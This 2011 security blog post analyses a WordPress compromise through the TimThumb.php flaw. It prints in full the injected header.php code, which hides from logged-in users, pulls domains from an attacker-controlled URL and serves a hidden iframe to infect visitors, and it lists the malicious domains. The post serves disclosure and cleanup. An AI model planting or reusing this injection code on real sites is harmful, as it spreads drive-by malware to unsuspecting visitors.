The Latest in IT Security

TimThumb.php attacks – Now using googlesafebrowsing dot com

24
Aug
2011


We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating the script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is a small modification to the attack method. Instead of modifying the .htaccess or infecting the jquery.js or l10n.js scripts within WordPress core, they are modifying the header.php of the compromised WordPress site with this code:

<!– Wordpress Counter –>
<?php
if ( !is_user_logged_in() && !isset ( $_COOKIE[‘MTPT’] ) ) {

if ( get_option ( ’domain_update’ ) === FALSE && ( $newdomain = ..
add_option ( ’domain’, $newdomain, ”, ’no’ );
add_option ( ’domain_update’, time (), ”, ’no’ );
}
if ( time () – get_option ( ’domain_update’ ) > 10*60 && ( $newdomain =..
update_option ( ’domain’, $newdomain );
update_option ( ’domain_update’, time () );
}

$domain = get_option ( ’domain’ );
if ($domain)
echo 
‘<script language="javascript">
var ExpDate = new Date ();
ExpDate&#46setTime(ExpDate&#46getTime() + (7 * 24 * 60 * 60));
SetCookie("MTPT","1",ExpDate, "/");

function SetCookie (name, value) {
 var argv = SetCookie&#46arguments;
 var argc = SetCookie&#46arguments&#46length;
 var expires = (argc > 2) ? argv[2] : null;
 var path = (argc > 3) ? argv[3] : null;
 var domain = (argc > 4) ? argv[4] : null;
 var secure = (argc > 5) ? argv[5] : false;
 document&#46cookie = name + "=" + escape (value) +
 ((expires == null) ? "" : ("; expires=" + expires&#46toGMTString())) +
 ((path == null) ? "" : ("; path=" + path)) +
 ((domain == null) ? "" : ("; domain=" + domain)) +
 ((secure == true) ? "; secure" : "");
}
</script>
<iframe src="http://’ &#46 $domain . ’/kwizhveo&#46php" width="1" height="1" 
</iframe>’;
}

function get_new_domain () {
$url = ’http://googlesafebrowsing&#46com/remoted&#46cc&#46txt’;
if ( function_exists ( ’curl_init’ ) ) {
$ch = @curl_init ( $url );
@curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, TRUE );
$doms = @curl_exec ( $ch );
@curl_close ( $ch );

else 
$doms = @file_get_contents ( $url );

if ( strpos ( $doms, ’||’ ) === false )
   return false;

$domains = explode ( ’||’, trim ( $doms ) );
return $domains[array_rand ( $domains )];
}
?>

<!– Wordpress Counter –>

What this code does it very simple. It connects to http://googlesafebrowsing.com/remoted.cc.txt and extracts a domain to be used to hide a malicious iframe in attempt to infect everyone visiting the site:

blaackhatt58.us.to/kwizhveo.php
heidiheernande.us.to/kwizhveo.php
gufmaurr79.us.to/kwizhveo.php
(and many others)

All the domains are hosted at 85.17.19.165 and in the .us.to top level domain. If your site is compromised, you can scan it here: http://sitecheck.sucuri.net.

If you need help cleaning up up, sign up here: http://sucuri.net/signup

Leave a reply


Categories

FRIDAY, OCTOBER 30, 2020
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments